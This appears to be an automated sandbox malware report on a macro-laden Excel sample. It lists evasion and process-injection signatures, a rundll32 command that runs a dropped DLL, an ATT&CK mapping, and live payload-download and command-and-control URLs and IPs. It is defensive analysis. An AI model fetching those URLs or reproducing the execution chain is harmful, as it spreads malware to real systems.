Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_009869A0 CreateToolhelp32Snapshot,GetCurrentProcessId,Thread32First,GetLastError,Thread32Next,

3_2_009869A0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dll	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Dropped PE file which has not been started: C:\ProgramData\formnet.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Ida\suicy.dll	Jump to dropped file

Source: C:\Windows\SysWOW64\msiexec.exe TID: 2796

Thread sleep time: -240000s >= -30000s

Jump to behavior

Anti Debugging:

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_00A3A0CC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

3_2_00A3A0CC

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_009869A0 CreateToolhelp32Snapshot,GetCurrentProcessId,Thread32First,GetLastError,Thread32Next,

3_2_009869A0

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_0097D830 LoadLibraryA,GetProcAddress,

3_2_0097D830

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00982EF0 mov eax, dword ptr fs:[00000030h]	3_2_00982EF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00A50D28 mov eax, dword ptr fs:[00000030h]	3_2_00A50D28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00A50865 push dword ptr fs:[00000030h]	3_2_00A50865
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00A50C5E mov eax, dword ptr fs:[00000030h]	3_2_00A50C5E
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_000A2EF0 mov eax, dword ptr fs:[00000030h]	4_2_000A2EF0

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00A3A0CC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		3_2_00A3A0CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00A3ABA4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		3_2_00A3ABA4

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to inject code into remote processes

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_0097AE40 CreateProcessA,VirtualAllocEx,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,SetThreadContext,VirtualProtectEx,ResumeThread,ExitProcess,

3_2_0097AE40

Yara detected hidden Macro 4.0 in Excel

Show sources

Source: Yara match

File source: SecuriteInfo.com.Heur.30497.xls, type: SAMPLE

Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe			Jump to behavior

Source: msiexec.exe, 00000004.00000002.2355445451.0000000000AD0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: msiexec.exe, 00000004.00000002.2355445451.0000000000AD0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: msiexec.exe, 00000004.00000002.2355445451.0000000000AD0000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_00A3968A cpuid

3_2_00A3968A

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: GetLocaleInfoA,

3_2_00A3F6BB

Source: C:\Windows\SysWOW64\msiexec.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_00A395A6 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

3_2_00A395A6

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_00971A00 CreateDialogParamW,GetVersion,

3_2_00971A00

Source: C:\Windows\SysWOW64\msiexec.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting4	Path Interception	Access Token Manipulation1	Masquerading1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Process Injection112	Disable or Modify Tools1	LSASS Memory	Security Software Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution43	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion1	Security Account Manager	Virtualization/Sandbox Evasion1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Access Token Manipulation1	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection112	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Scripting4	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information2	DCSync	System Information Discovery35	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Rundll321	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Software Packing2	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
4.2.msiexec.exe.90000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen2		Download File
3.2.rundll32.exe.970000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen2		Download File

Domains

Source	Detection	Scanner	Label	Link
rnollg.com	2%	Virustotal		Browse
gadgetswolf.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://wmwifbajxxbcxmucxmlc.com/files/april24.dll)	0%	Avira URL Cloud	safe
https://govemedico.tk/t	0%	Avira URL Cloud	safe
http://crl3.digicert	0%	Avira URL Cloud	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
https://homesoapmolds.com/post.phpx	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
https://gadgetswolf.com/	0%	Avira URL Cloud	safe
https://rnollg.com/kev/scfrd.dll	0%	Avira URL Cloud	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
https://gadgetswolf.com/post.php	0%	Avira URL Cloud	safe
https://govemedico.tk/	0%	Avira URL Cloud	safe
https://homesoapmolds.com/post.php	0%	Avira URL Cloud	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
https://gadgetswolf.com/post.phpF/	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://wmwifbajxxbcxmucxmlc.com/files/april24.dll~	0%	Avira URL Cloud	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
https://rnollg.com/kev/scfrd.dll$8	0%	Avira URL Cloud	safe
https://homesoapmolds.com/	0%	Avira URL Cloud	safe
https://govemedico.tk/post.php	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
homesoapmolds.com	172.67.198.109	true	false		unknown
rnollg.com	172.67.150.228	true	false	2%, Virustotal, Browse	unknown
gadgetswolf.com	172.67.200.147	true	false	0%, Virustotal, Browse	unknown
govemedico.tk	172.67.158.184	true	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://wmwifbajxxbcxmucxmlc.com/files/april24.dll)	D0EE0000.0.dr	false	Avira URL Cloud: safe	unknown
http://www.windows.com/pctv.	rundll32.exe, 00000003.00000002.2154626174.0000000001F30000.00000002.00000001.sdmp	false		high
http://investor.msn.com	rundll32.exe, 00000002.00000002.2155279240.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2154626174.0000000001F30000.00000002.00000001.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	rundll32.exe, 00000002.00000002.2155279240.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2154626174.0000000001F30000.00000002.00000001.sdmp	false		high
https://govemedico.tk/t	msiexec.exe, 00000004.00000002.2356290473.0000000002EC0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/server1.crl0	msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmp	false		high
http://crl3.digicert	msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmp, msiexec.exe, 00000004.00000002.2355352317.000000000071B000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net03	msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://homesoapmolds.com/post.phpx	msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://gadgetswolf.com/	msiexec.exe, 00000004.00000002.2355361210.0000000000732000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://rnollg.com/kev/scfrd.dll	before.1.0.0.sheet.csv_unpack	true	Avira URL Cloud: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://gadgetswolf.com/post.php	msiexec.exe, 00000004.00000002.2355352317.000000000071B000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://govemedico.tk/	msiexec.exe, 00000004.00000002.2356290473.0000000002EC0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://homesoapmolds.com/post.php	msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	rundll32.exe, 00000002.00000002.2155690592.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2154774311.0000000002117000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hotmail.com/oe	rundll32.exe, 00000002.00000002.2155279240.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2154626174.0000000001F30000.00000002.00000001.sdmp	false		high
https://gadgetswolf.com/post.phpF/	msiexec.exe, 00000004.00000002.2355352317.000000000071B000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	rundll32.exe, 00000002.00000002.2155690592.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2154774311.0000000002117000.00000002.00000001.sdmp	false		high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.icra.org/vocabulary/.	rundll32.exe, 00000002.00000002.2155690592.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2154774311.0000000002117000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	msiexec.exe, 00000004.00000002.2355484698.0000000001ED0000.00000002.00000001.sdmp	false		high
http://investor.msn.com/	rundll32.exe, 00000002.00000002.2155279240.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2154626174.0000000001F30000.00000002.00000001.sdmp	false		high
http://www.%s.comPA	msiexec.exe, 00000004.00000002.2355484698.0000000001ED0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://wmwifbajxxbcxmucxmlc.com/files/april24.dll~	SecuriteInfo.com.Heur.30497.xls	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net0D	msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://rnollg.com/kev/scfrd.dll$8	SecuriteInfo.com.Heur.30497.xls, D0EE0000.0.dr	false	Avira URL Cloud: safe	unknown
https://secure.comodo.com/CPS0	msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmp	false		high
https://homesoapmolds.com/	msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/2048ca.crl0	msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmp	false		high
Https://homesoapmolds.com/post.php	msiexec.exe, 00000004.00000003.2163545510.000000000076F000.00000004.00000001.sdmp	false		unknown
https://govemedico.tk/post.php	msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.158.184	unknown	United States	13335	CLOUDFLARENETUS	false
172.67.150.228	unknown	United States	13335	CLOUDFLARENETUS	false
172.67.200.147	unknown	United States	13335	CLOUDFLARENETUS	false
172.67.198.109	unknown	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	344767
Start date:	27.01.2021
Start time:	04:09:13
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.Heur.30497.14031 (renamed file extension from 14031 to xls)
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.expl.evad.winXLS@7/12@4/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 75.4% (good quality ratio 75.2%) Quality average: 89.8% Quality standard deviation: 18.6%
HCA Information:	Successful, ratio: 84% Number of executed functions: 41 Number of non-executed functions: 27
Cookbook Comments:	Adjust boot time Enable AMSI Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:10:12	API Interceptor	1200x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
172.67.158.184	case (2553).xls	Get hash	malicious	Browse
	case (4374).xls	Get hash	malicious	Browse
	case (166).xls	Get hash	malicious	Browse
172.67.150.228	case (1057).xls	Get hash	malicious	Browse
	case (4335).xls	Get hash	malicious	Browse
	case (1522).xls	Get hash	malicious	Browse
	case (166).xls	Get hash	malicious	Browse
172.67.200.147	SecuriteInfo.com.Exploit.Siggen3.8790.14645.xls	Get hash	malicious	Browse
	case (4374).xls	Get hash	malicious	Browse
	case (4335).xls	Get hash	malicious	Browse
	case (1522).xls	Get hash	malicious	Browse
172.67.198.109	case (1057).xls	Get hash	malicious	Browse
172.67.198.109	case (166).xls	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
govemedico.tk	case (2553).xls	Get hash	malicious	Browse	172.67.158.184
	case (1057).xls	Get hash	malicious	Browse	104.21.73.69
	case (4374).xls	Get hash	malicious	Browse	104.21.73.69
	case (4335).xls	Get hash	malicious	Browse	104.21.73.69
	case (1522).xls	Get hash	malicious	Browse	104.21.73.69
	case (4374).xls	Get hash	malicious	Browse	172.67.158.184
	case (166).xls	Get hash	malicious	Browse	172.67.158.184
gadgetswolf.com	SecuriteInfo.com.Exploit.Siggen3.8790.14645.xls	Get hash	malicious	Browse	172.67.200.147
	case (2553).xls	Get hash	malicious	Browse	104.21.44.135
	case (2553).xls	Get hash	malicious	Browse	104.21.44.135
	case (1057).xls	Get hash	malicious	Browse	104.21.44.135
	case (4374).xls	Get hash	malicious	Browse	172.67.200.147
	case (4335).xls	Get hash	malicious	Browse	172.67.200.147
	case (1522).xls	Get hash	malicious	Browse	172.67.200.147
	case (4374).xls	Get hash	malicious	Browse	104.21.44.135
	case (166).xls	Get hash	malicious	Browse	104.21.44.135
rnollg.com	case (1057).xls	Get hash	malicious	Browse	172.67.150.228
	case (4335).xls	Get hash	malicious	Browse	172.67.150.228
	case (1522).xls	Get hash	malicious	Browse	172.67.150.228
	case (166).xls	Get hash	malicious	Browse	172.67.150.228
homesoapmolds.com	case (2553).xls	Get hash	malicious	Browse	104.21.60.169
	case (1057).xls	Get hash	malicious	Browse	172.67.198.109
	case (4374).xls	Get hash	malicious	Browse	104.21.60.169
	case (4335).xls	Get hash	malicious	Browse	104.21.60.169
	case (1522).xls	Get hash	malicious	Browse	104.21.60.169
	case (4374).xls	Get hash	malicious	Browse	104.21.60.169
	case (166).xls	Get hash	malicious	Browse	172.67.198.109

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	SecuriteInfo.com.Exploit.Siggen3.8790.14645.xls	Get hash	malicious	Browse	172.67.200.147
	SecuriteInfo.com.Trojan.DOC.Agent.ATB.11104.xls	Get hash	malicious	Browse	172.67.201.174
	SecuriteInfo.com.Trojan.Inject4.6746.26345.exe	Get hash	malicious	Browse	162.159.130.233
	SecuriteInfo.com.Trojan.Inject4.6746.26345.exe	Get hash	malicious	Browse	162.159.134.233
	case (2553).xls	Get hash	malicious	Browse	104.21.44.135
	case (2553).xls	Get hash	malicious	Browse	104.21.60.169
	case (1057).xls	Get hash	malicious	Browse	172.67.198.109
	case (4374).xls	Get hash	malicious	Browse	104.21.73.69
	case (4335).xls	Get hash	malicious	Browse	104.21.73.69
	case (1522).xls	Get hash	malicious	Browse	104.21.73.69
	case (4374).xls	Get hash	malicious	Browse	104.21.60.169
	case (166).xls	Get hash	malicious	Browse	172.67.198.109
	PAYMENT.xlsx	Get hash	malicious	Browse	104.16.19.94
	PAYMENT.xlsx	Get hash	malicious	Browse	104.16.18.94
	Informacion.doc	Get hash	malicious	Browse	104.21.89.78
	PAYMENT.260121.xlsx	Get hash	malicious	Browse	162.159.133.233
	SecuriteInfo.com.Trojan.Packed2.42783.27799.exe	Get hash	malicious	Browse	104.21.19.200
	SecuriteInfo.com.Trojan.Packed2.42783.24703.exe	Get hash	malicious	Browse	104.21.19.200
	Ewqm21Iwdh.exe	Get hash	malicious	Browse	104.21.19.200
	a4iz7zkilq.exe	Get hash	malicious	Browse	104.21.19.200
CLOUDFLARENETUS	SecuriteInfo.com.Exploit.Siggen3.8790.14645.xls	Get hash	malicious	Browse	172.67.200.147
	SecuriteInfo.com.Trojan.DOC.Agent.ATB.11104.xls	Get hash	malicious	Browse	172.67.201.174
	SecuriteInfo.com.Trojan.Inject4.6746.26345.exe	Get hash	malicious	Browse	162.159.130.233
	SecuriteInfo.com.Trojan.Inject4.6746.26345.exe	Get hash	malicious	Browse	162.159.134.233
	case (2553).xls	Get hash	malicious	Browse	104.21.44.135
	case (2553).xls	Get hash	malicious	Browse	104.21.60.169
	case (1057).xls	Get hash	malicious	Browse	172.67.198.109
	case (4374).xls	Get hash	malicious	Browse	104.21.73.69
	case (4335).xls	Get hash	malicious	Browse	104.21.73.69
	case (1522).xls	Get hash	malicious	Browse	104.21.73.69
	case (4374).xls	Get hash	malicious	Browse	104.21.60.169
	case (166).xls	Get hash	malicious	Browse	172.67.198.109
	PAYMENT.xlsx	Get hash	malicious	Browse	104.16.19.94
	PAYMENT.xlsx	Get hash	malicious	Browse	104.16.18.94
	Informacion.doc	Get hash	malicious	Browse	104.21.89.78
	PAYMENT.260121.xlsx	Get hash	malicious	Browse	162.159.133.233
	SecuriteInfo.com.Trojan.Packed2.42783.27799.exe	Get hash	malicious	Browse	104.21.19.200
	SecuriteInfo.com.Trojan.Packed2.42783.24703.exe	Get hash	malicious	Browse	104.21.19.200
	Ewqm21Iwdh.exe	Get hash	malicious	Browse	104.21.19.200
	a4iz7zkilq.exe	Get hash	malicious	Browse	104.21.19.200
CLOUDFLARENETUS	SecuriteInfo.com.Exploit.Siggen3.8790.14645.xls	Get hash	malicious	Browse	172.67.200.147
	SecuriteInfo.com.Trojan.DOC.Agent.ATB.11104.xls	Get hash	malicious	Browse	172.67.201.174
	SecuriteInfo.com.Trojan.Inject4.6746.26345.exe	Get hash	malicious	Browse	162.159.130.233
	SecuriteInfo.com.Trojan.Inject4.6746.26345.exe	Get hash	malicious	Browse	162.159.134.233
	case (2553).xls	Get hash	malicious	Browse	104.21.44.135
	case (2553).xls	Get hash	malicious	Browse	104.21.60.169
	case (1057).xls	Get hash	malicious	Browse	172.67.198.109
	case (4374).xls	Get hash	malicious	Browse	104.21.73.69
	case (4335).xls	Get hash	malicious	Browse	104.21.73.69
	case (1522).xls	Get hash	malicious	Browse	104.21.73.69
	case (4374).xls	Get hash	malicious	Browse	104.21.60.169
	case (166).xls	Get hash	malicious	Browse	172.67.198.109
	PAYMENT.xlsx	Get hash	malicious	Browse	104.16.19.94
	PAYMENT.xlsx	Get hash	malicious	Browse	104.16.18.94
	Informacion.doc	Get hash	malicious	Browse	104.21.89.78
	PAYMENT.260121.xlsx	Get hash	malicious	Browse	162.159.133.233
	SecuriteInfo.com.Trojan.Packed2.42783.27799.exe	Get hash	malicious	Browse	104.21.19.200
	SecuriteInfo.com.Trojan.Packed2.42783.24703.exe	Get hash	malicious	Browse	104.21.19.200
	Ewqm21Iwdh.exe	Get hash	malicious	Browse	104.21.19.200
	a4iz7zkilq.exe	Get hash	malicious	Browse	104.21.19.200

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
7dcce5b76c8b17472d024758970a406b	case (2553).xls	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 172.67.200.147 172.67.198.109
	case (1057).xls	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 172.67.200.147 172.67.198.109
	case (4335).xls	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 172.67.200.147 172.67.198.109
	case (1522).xls	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 172.67.200.147 172.67.198.109
	case (4374).xls	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 172.67.200.147 172.67.198.109
	case (166).xls	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 172.67.200.147 172.67.198.109
	PAYMENT.xlsx	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 172.67.200.147 172.67.198.109
	case (547).xls	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 172.67.200.147 172.67.198.109
	Dridex-06-bc1b.xlsm	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 172.67.200.147 172.67.198.109
